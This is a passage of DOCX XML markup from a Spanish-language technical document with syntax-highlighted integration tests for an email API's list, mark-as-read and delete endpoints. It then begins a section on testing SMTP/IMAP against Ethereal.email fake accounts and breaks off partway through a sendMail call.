          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { 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authToken</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(response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">payload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dates </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> body</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">((e</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">date</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">getTime</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dates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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">expect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(dates[i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FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeGreaterThanOrEqual</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(dates[i])</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'PATCH /api/v1/emails/:id marca como leído'</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email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">findOne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ accountId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> isRead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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'PATCH'</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VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`/api/v1/emails/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { 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authToken</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payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { isRead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statusCode</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200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updated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">findById</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">_id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(updated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">isRead</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'DELETE /api/v1/emails/:id elimina un email'</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email </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">findOne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({ accountId })</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Normal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'DELETE'</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VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`/api/v1/emails/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      headers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { 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authToken</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statusCode</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204</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deleted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">findById</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(email</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">_id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(deleted)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">toBeNull</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afterAll</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06"/>
    <w:bookmarkStart w:id="207" w:name="mock-imapsmtp-con-ethereal.email"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.2.3 Mock IMAP/SMTP con Ethereal.email</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para tests que requieren protocolos IMAP y SMTP reales sin riesgo de envío, Ethereal.email proporciona un servicio SMTP/IMAP falso donde los correos nunca se entregan pero pueden verificarse vía IMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[300]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[276]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/api/src/services/__tests__/imap.integration.spec.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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nodemailer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'nodemailer'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { ImapFlow } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'imapflow'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostalMime </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'postal-mime'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'IMAP/SMTP Integration con Ethereal.email'</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'envía email vía SMTP y lo recupera vía IMAP'</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Crear cuenta Ethereal</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testAccount </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nodemailer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createTestAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// 2. Enviar email vía SMTP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> transporter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> nodemailer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">createTransport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">smtp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">host</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">smtp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">smtp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testAccount</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">pass</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transporter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sendMail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">({</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'sender@example.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'recipient@example.com'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Test IMAP Integration'</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Este es el cuerpo en texto plano'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">      html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
